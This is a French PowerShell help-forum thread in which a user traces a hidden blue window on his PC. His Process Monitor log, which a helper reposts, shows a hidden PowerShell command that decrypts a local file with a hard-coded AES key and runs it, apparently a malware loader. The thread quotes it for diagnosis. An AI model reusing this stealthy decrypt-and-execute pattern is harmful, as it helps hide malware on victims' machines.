Question Fenêtre bleue furtive et aléatoire

Plus d'informations
il y a 1 an 2 mois #34685 par Kaou
Réponse de Kaou sur le sujet Fenêtre bleue furtive et aléatoire
Bonjour, Je viens de démarrer mon PC, j'ai ouvert le gestionnaire de tâches, il n'y a aucun process de PowerShell de lancé. J'ai quelques questions sur PowerShell, si vous pouviez m'éclairer à ce propos : - Un process PowerShell peut-il se lancer de lui-même ou est-ce un autre programme qui provoque son ouverture ? - Un process PowerShell peut-il lancer un autre process PowerShell ? - En quoi consiste précisément la fonctionnalité de PowerShell ?  J'ai retrouvé une copie de fichiers mis en quarantaine par mon antivirus sur 3 jours, j'ai eu une rafale d'alertes, ces fichiers pourraient-ils avoir été à l'origine du phénomène "fenêtre bleue", je n'avais pas fait le rapprochement, mais depuis je me pose la question ? Tous les fichiers qui avaient été mis en quarantaine ont bien été supprimés, je viens de le vérifier, et l'analyse de l'antivirus est clean. Hier, pendant la période d'utilisation du PC je n'ai pas eu de fenêtre bleue, sans avoir rien fait de particulier. Merci encore pour vos réponses et votre aide.

Connexion ou Créer un compte pour participer à la conversation.

Plus d'informations
il y a 1 an 2 mois #34686 par Kaou
Manifestement je me suis réjoui un peu trop vite, je viens d'avoir une nouvelle fenêtre bleue ce matin, hier matin je n'avais pas utilisé mon ordinateur.
En fonction de l'heure, dans l'observateur d'évènements, j'ai trouvé un process "Bonjour Service" en erreur, y a-t-il un rapport ?
Je joins la copie écran, si cela peut aider...
Pièces jointes :

Plus d'informations
il y a 1 an 2 mois #34687 par xyz
Réponse de xyz sur le sujet Fenêtre bleue furtive et aléatoire
>>En quoi consiste précisément la fonctionnalité de PowerShell ? >>Un process
C'est un shell (outil d'administration système).

>>PowerShell peut-il se lancer de lui-même
Non,il faut un 'lanceur' ou un timer (tâche planifiée).

>>j'ai eu une rafale d'alertes, ces fichiers pourraient-ils avoir été à l'origine du phénomène
Tant que l'on ne connait pas le process qui exécute une instance Powershell on ne peut pas savoir. En tout cas ta machine est à contrôler.
Voir : answers.microsoft.com/fr-fr/windows/foru...97-8905-3b50f01c0d31

Le soft cité FRST64 :
www.lesnumeriques.com/telecharger/farbar...very-scan-tool-23904

>>j'ai trouvé un process "Bonjour Service" en erreur, y a-t-il un rapport
Aucune idée, à priori non, mais sans accès à la machine on ne peut pas savoir.

Tutoriels PowerShell

Plus d'informations
il y a 1 an 2 mois #34688 par Kaou
La procédure avec FRST64 a déjà été réalisée. Les contrôles ont également été effectués avec AVIRA antivirus Malwarebytes et l'outil Scanner de sécurité Microsoft.
Les dernières informations m'éclairent un peu plus ; je vais démarrer mon ordinateur demain matin avec Process Monitor et une vidéo de capture d'écran, comme cela semble arriver dans un créneau horaire assez réduit j'ai peut-être une chance de trouver le lanceur ou la tâche à l'origine de cette fenêtre.
Je vous tiendrai au courant, bonne soirée.

Plus d'informations
il y a 1 an 2 mois #34690 par Kaou
Bonjour,
J'ai la copie du process qui a lancé PowerShell au moment ou la fenêtre bleue est apparue, le voici :

Date:    23/02/2025 11:43:13,9168302
Thread:    23612
Class:    Process
Operation:    Process Start
Result:    SUCCESS
Path:    
Duration:    0.0000000
Parent PID:    2412
Command line:    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoL -NonI -W Hidden -nop ". {$e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte;$a=[System.Security.Cryptography.Aes]::Create();$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175);$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114);Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))));}"
Current directory:    C:\Windows\system32\
Environment:    
    ALLUSERSPROFILE=C:\ProgramData
    APPDATA=C:\Users\****\AppData\Roaming
    ChocolateyInstall=C:\ProgramData\chocolatey
    ChocolateyLastPathUpdate=133837534645326786
    CommonProgramFiles=C:\Program Files\Common Files
    CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
    CommonProgramW6432=C:\Program Files\Common Files
    COMPUTERNAME=****-DESKTOP-65
    ComSpec=C:\Windows\system32\cmd.exe
    DokanLibrary1=C:\Program Files\Dokan\Dokan Library-1.5.1\
    DokanLibrary1_LibraryPath_x64=C:\Program Files\Dokan\Dokan Library-1.5.1\lib\
    DokanLibrary1_LibraryPath_x86=C:\Program Files\Dokan\Dokan Library-1.5.1\x86\lib\
    DriverData=C:\Windows\System32\Drivers\DriverData
    HOMEDRIVE=C:
    HOMEPATH=\Users\****
    LOCALAPPDATA=C:\Users\****\AppData\Local
    LOGONSERVER=\\****-DESKTOP-65
    NUMBER_OF_PROCESSORS=32
    OneDrive=C:\Users\****\OneDrive
    OS=Windows_NT
    PAI_MODEL_DIR=C:\ProgramData\Topaz Labs LLC\Topaz Photo AI\models
    Path=C:\Program Files (x86)\Common Files\Oracle\Java\java8path;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\dotnet\;C:\Program Files\IDM Computer Solutions\UltraFinder;C:\Program Files\IDM Computer Solutions\UltraCompare;C:\ProgramData\chocolatey\bin;C:\Users\****\AppData\Local\Microsoft\WindowsApps;C:\Users\****\AppData\Local\Programs\Fiddler;C:\Users\****\AppData\Local\JpegminiPro3\;C:\Program Files\Tesseract-OCR
    PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE=AMD64
    PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 183 Stepping 1, GenuineIntel
    PROCESSOR_LEVEL=6
    PROCESSOR_REVISION=b701
    ProgramData=C:\ProgramData
    ProgramFiles=C:\Program Files
    ProgramFiles(x86)=C:\Program Files (x86)
    ProgramW6432=C:\Program Files
    PSModulePath=%ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PUBLIC=C:\Users\Public
    SystemDrive=C:
    SystemRoot=C:\Windows
    TEMP=C:\Users\****\AppData\Local\Temp
    TMP=C:\Users\****\AppData\Local\Temp
    USERDOMAIN=****-DESKTOP-65
    USERDOMAIN_ROAMINGPROFILE=****-DESKTOP-65
    USERNAME=****
    USERPROFILE=C:\Users\****
    windir=C:\Windows
    __PSLockDownPolicy=0

Il semblerait que ce soit "chocolatey" qui soit à l'origine de cette fenêtre, dîtes-moi ce que vous en pensez ; je joins également la capture d'écran de la fenêtre bleue si cela peut aider.
Bonne journée
Yann

Plus d'informations
il y a 1 an 2 mois #34691 par xyz
Réponse de xyz sur le sujet Fenêtre bleue furtive et aléatoire
>>Il semblerait que ce soit "chocolatey" qui soit à l'origine de cette fenêtre
Lorsque je vois ce type de code, je me demande pourquoi obfusquer cet appel.
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoL -NonI -W Hidden -nop ". {$e=Get-Content -Path 'C:\Windows\sys.txt' -Raw -Encoding Byte

$a=[System.Security.Cryptography.Aes]::Create()

$a.Key=@(105,201,149,232,136,123,85,176,56,19,130,220,82,40,93,120,9,196,76,239,53,91,88,114,222,161,149,67,67,243,7,175)

$a.IV=@(248,114,199,61,179,50,120,196,216,70,158,55,141,248,92,114)

Invoke-Command ([Scriptblock]::Create(([System.Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($e,0,$e.Length)))))
Pour en être sûr il faut regarder quel est le process '2412' :
Parent PID: 2412

Et chocolatey installe une application pas un traitement récurrent, j'ai un doute...

Tutoriels PowerShell

Temps de génération de la page : 0.045 secondes
Propulsé par Kunena